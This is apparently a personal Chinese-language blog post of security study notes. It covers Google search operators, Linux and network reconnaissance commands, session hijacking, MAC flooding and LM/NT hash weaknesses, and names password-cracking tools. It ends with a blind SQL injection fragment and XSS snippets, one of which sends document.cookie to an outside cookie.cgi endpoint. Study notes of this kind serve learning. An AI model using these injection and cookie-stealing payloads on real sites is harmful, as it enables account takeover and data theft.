<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">






  
  
  <link rel="stylesheet" media="all" href="/disshu.github.io/lib/Han/dist/han.min.css?v=3.3">




<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/disshu.github.io/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/disshu.github.io/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/disshu.github.io/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/disshu.github.io/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/disshu.github.io/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/disshu.github.io/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/disshu.github.io/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="打开本地web服务器 12345678sudo nginxsudo php-fpmsudo lsof -i:4000//防止4000被占用，报错kill -9 进程号hexo clean//第一步hexo g//生成静态文件，编译是否正确hexo d//部署hexo s//本地,配合前两步使用  高级搜索：site：语法“site:” 只搜索指定网域里的关键词，例如“exploits site:h">
<meta property="og:type" content="article">
<meta property="og:title" content="网络安全随记">
<meta property="og:url" content="http://yoursite.com/2019/12/08/网络安全随记/index.html">
<meta property="og:site_name" content="disshu">
<meta property="og:description" content="打开本地web服务器 12345678sudo nginxsudo php-fpmsudo lsof -i:4000//防止4000被占用，报错kill -9 进程号hexo clean//第一步hexo g//生成静态文件，编译是否正确hexo d//部署hexo s//本地,配合前两步使用  高级搜索：site：语法“site:” 只搜索指定网域里的关键词，例如“exploits site:h">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-12-09T12:50:28.271Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="网络安全随记">
<meta name="twitter:description" content="打开本地web服务器 12345678sudo nginxsudo php-fpmsudo lsof -i:4000//防止4000被占用，报错kill -9 进程号hexo clean//第一步hexo g//生成静态文件，编译是否正确hexo d//部署hexo s//本地,配合前两步使用  高级搜索：site：语法“site:” 只搜索指定网域里的关键词，例如“exploits site:h">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/disshu.github.io/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/12/08/网络安全随记/">





  <title>网络安全随记 | disshu</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  


  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>
    

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">

      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/disshu.github.io/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">disshu</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/disshu.github.io/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/disshu.github.io/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/disshu.github.io/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/disshu.github.io/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/disshu.github.io/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-arechive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/disshu.github.io/2019/12/08/网络安全随记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="disshu">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/disshu.github.io/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="disshu">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">网络安全随记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-12-08T09:10:32+08:00">
                2019-12-07
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body han-init-context" itemprop="articleBody">

      
      

      
        <p><strong>打开本地web服务器</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">sudo nginx</span><br><span class="line">sudo php-fpm</span><br><span class="line">sudo lsof -i:4000//防止4000被占用，报错</span><br><span class="line">kill -9 进程号</span><br><span class="line">hexo clean//第一步</span><br><span class="line">hexo g//生成静态文件，编译是否正确</span><br><span class="line">hexo d//部署</span><br><span class="line">hexo s//本地,配合前两步使用</span><br></pre></td></tr></table></figure>

<h2 id="高级搜索："><a href="#高级搜索：" class="headerlink" title="高级搜索："></a>高级搜索：</h2><p>site：语法“site:” 只搜索指定网域里的关键词，例如“exploits</p>
<p>site:hackingspirits.com”将搜索hackingspirits.com网站上的所有包含exploits的页面。</p>
<p>link：按引用搜索将列出所有包含特定链接的页面，例如 “link:<a href="http://www.securityfocus.com”将列出所有包含指向" target="_blank" rel="noopener">www.securityfocus.com”将列出所有包含指向</a> Securityfocus主页的网址的页面。</p>
<p>inurl：按 链接搜索返回那些网址url里面包含你指定关键词的页面。例如“inurl: passwd” ，返回那些网址url里面包含你指定关键词passwd的页面。</p>
<p>allinurl：如果含有多个关键词，则用这个</p>
<p>allintitle&amp;intitle：搜索标题关键字，如果有多个，则用allintitle</p>
<p>related：按相似搜索将列出与指定网页相似的页面，例如”related:<a href="http://www.securityfocus" target="_blank" rel="noopener">www.securityfocus</a><br>.com将返回与Securityfocus筑页相似的页面。注意在”related:”与网址间不可以有空格</p>
<p>cache:网 页快照，google将返回给你他储存下来的历史页面。如果你同时指定了其他查询词，google将在搜索结果里以高亮显示。例如查询”cache: <a href="http://www.hackingspirits.com&quot;" target="_blank" rel="noopener">www.hackingspirits.com&quot;</a></p>
<p>guest:在返回的结果里将高亮显示”guest”。</p>
<p>filetype：后面可以加你想要找的文件后缀。</p>
<p>info:查找指定站点的一些基本信息</p>
<hr>
<h2 id="linux-命令行操作："><a href="#linux-命令行操作：" class="headerlink" title="linux 命令行操作："></a>linux 命令行操作：</h2><p><em>useradd/groupadd  useradd 命令用于建立用户帐号。groupadd建立组用户<br>userdel/groupdel 删除<br>chfn:改变指纹信息 finger<br>chsh:Linux chsh命令用于更改使用者 shell 设定。<br>chage:修改用户密码<br>usermod:修改用户账号，包括用户名，uid等<br>passwd/gpasswd：修改密码<br>chmod：u 表示该文件的拥有者，g 表示与该文件的拥有者属于同一个群体(group)者，o 表示其他以外的人，a 表示这三者皆是。+ 表示增加权限、- 表示取消权限、= 表示唯一设定权限。<br>r 表示可读取，w 表示可写入，x 表示可执行，X 表示只有当该文件是个子目录或者该文件已经被设定过为可执行</em></p>
<hr>
<h2 id="工具命令："><a href="#工具命令：" class="headerlink" title="工具命令："></a>工具命令：</h2><p><em>ping:-i设置ttl -t一直发 -l 指定长度包<br>nslookup:<br>host：host 主机名 出ip地址 host ip出主机名<br>hostnew<br>traceroute:linux用法<br>tracert：windows用法<br>nmap<br>telent：远程连接<br>net：net user /add<br>dns查询<br>dig 加ip 要筛选的内容<br>whois ip查询域名 #whois 查询<br>fierce -dns baidu.com -threads 3#fierce dig nslookup是dns查询<br>su -c command 用户 跳转到账号为用户 执行command 语句 执行后再回去</em></p>
<hr>
<h3 id="ip欺骗"><a href="#ip欺骗" class="headerlink" title="ip欺骗"></a>ip欺骗</h3><p>会话劫持过程<br>发现目标主机-&gt;确定会话状态-&gt;猜测序列号-&gt;使靶机下线-&gt;接管会话，创建后门<br>针对源路由欺骗：禁止路由器的源路由<br>sql注入过程<br>寻找可能存在sql注入漏洞的连接<br>测试该网站是否有sql漏洞<br>爆数据<br>共享式局域网嗅探(使用广播方式)<br>广播，单播，组播，混杂</p>
<h2 id="mac洪泛攻击，基于交换式局域网嗅探技术-理论上不能进行嗅探"><a href="#mac洪泛攻击，基于交换式局域网嗅探技术-理论上不能进行嗅探" class="headerlink" title="mac洪泛攻击，基于交换式局域网嗅探技术(理论上不能进行嗅探)"></a>mac洪泛攻击，基于交换式局域网嗅探技术(理论上不能进行嗅探)</h2><p>发送请求的主机不回对ARP应答进行验证<br>大多数主机会接受未请求的arp应答且不进行验证<br>主机不会验证ip地址和mac地址的绑定是否正确<br>向交换机发送大量含有虚假MAC地址的数据帧，交换机的映射表就会溢出，此时交换机就会跟集线器一样通过广播方式向所有端口发送数据包，此时我们可以嗅探</p>
<h2 id="LM-HASH"><a href="#LM-HASH" class="headerlink" title="LM-HASH"></a>LM-HASH</h2><p><strong>口令的最大长度为14个字符(14个字节)，如果不够用0字符相凑,分割成两个7字节<br>首先字母转为大写字符，通过str_to_key(),转为两个八个字节 64比特</strong><br><em>缺陷:密钥太短，如果口令不足七位，那么最后七位的部分是固定的</em></p>
<h2 id="NT-HASH"><a href="#NT-HASH" class="headerlink" title="NT-HASH"></a>NT-HASH</h2><p><strong>使用unicode编码，MD4加密，最后生成128位<br>缺陷：明文口令大小写太敏感，无法根据NT-HASH值判断明文长度</strong></p>
<h2 id="口令破解"><a href="#口令破解" class="headerlink" title="口令破解:"></a>口令破解:</h2><p><strong>windows:使用l0phcrack和Pwdump找到SAM文件散列<br>join the ripper破解口令或者Ophcrack</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wireshark分析，overflow分析，sql注入分析</span><br></pre></td></tr></table></figure>

<h2 id="VPN"><a href="#VPN" class="headerlink" title="VPN"></a>VPN</h2><p>应用层:ssh,pgp<br>传输层:ssl-&gt;tls<br>网络层:ipsec and so on<br>建立vpn的两个基本问题：<br>1、隧道化<br>2、加密</p>
<hr>
<h2 id="sql注入不常见语句"><a href="#sql注入不常见语句" class="headerlink" title="sql注入不常见语句"></a>sql注入不常见语句</h2><p><em>and 1=(select id from (select * from admin where id=1) where asc(mid(username,1,1))==i)<br>i去遍历</em></p>
<h2 id="xss语句"><a href="#xss语句" class="headerlink" title="xss语句"></a>xss语句</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.com/cookie.cgi?’+document.cookie</span><br><span class="line">src=&quot;javascript:&quot;</span><br><span class="line">[img]javascript:(内容)[/img]</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/disshu.github.io/2019/12/08/计划/" rel="next" title="计划/2019">
                <i class="fa fa-chevron-left"></i> 计划/2019
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/disshu.github.io/2019/12/09/js原生污染-curl常用命令/" rel="prev" title="js原生污染+curl常用命令">
                js原生污染+curl常用命令 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">disshu</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/disshu.github.io/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#高级搜索："><span class="nav-number">1.</span> <span class="nav-text">高级搜索：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#linux-命令行操作："><span class="nav-number">2.</span> <span class="nav-text">linux 命令行操作：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#工具命令："><span class="nav-number">3.</span> <span class="nav-text">工具命令：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ip欺骗"><span class="nav-number">3.1.</span> <span class="nav-text">ip欺骗</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mac洪泛攻击，基于交换式局域网嗅探技术-理论上不能进行嗅探"><span class="nav-number">4.</span> <span class="nav-text">mac洪泛攻击，基于交换式局域网嗅探技术(理论上不能进行嗅探)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LM-HASH"><span class="nav-number">5.</span> <span class="nav-text">LM-HASH</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NT-HASH"><span class="nav-number">6.</span> <span class="nav-text">NT-HASH</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#口令破解"><span class="nav-number">7.</span> <span class="nav-text">口令破解:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#VPN"><span class="nav-number">8.</span> <span class="nav-text">VPN</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql注入不常见语句"><span class="nav-number">9.</span> <span class="nav-text">sql注入不常见语句</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss语句"><span class="nav-number">10.</span> <span class="nav-text">xss语句</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">disshu</span>

  
</div>


  <div class="powered-by"> <a class="theme-link" target="_blank" href="#">disshu</a> 的专属</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/disshu.github.io/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/disshu.github.io/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/disshu.github.io/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/disshu.github.io/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/disshu.github.io/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/disshu.github.io/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/disshu.github.io/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/disshu.github.io/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/disshu.github.io/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/disshu.github.io/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/disshu.github.io/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/disshu.github.io/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/disshu.github.io/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
